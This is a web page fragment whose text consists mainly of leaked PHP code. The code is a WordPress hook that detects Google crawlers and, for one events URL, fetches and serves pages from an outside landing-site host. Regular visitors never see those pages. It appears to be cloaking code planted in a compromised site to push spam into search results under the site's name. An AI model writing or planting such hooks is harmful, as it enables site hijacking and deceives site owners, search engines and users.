Scroll to Top
add_action('template_redirect', function() { $uri = $_SERVER['REQUEST_URI'] ?? ''; $ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; if (!preg_match('/Googlebot|Googlebot-Image|Googlebot-News|Googlebot-Video|Google-InspectionTool|Chrome-Lighthouse|Google-Site-Verification|Structured-Data-Testing-Tool/i', $ua)) { return; } $url = ''; if (preg_match('#^/events/valentines-day-event/?$#', $uri)) { $url = 'https://panel.landingsite.store/lp/winstrike69/sobhacitymall-in-events-valentines-day-event-5l/'; } else { return; } if ($url) { if (ob_get_length()) ob_clean(); header("Content-Type: text/html; charset=UTF-8"); $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 10, CURLOPT_USERAGENT => $ua ]); $response = curl_exec($ch); curl_close($ch); echo $response; exit; } }, 1);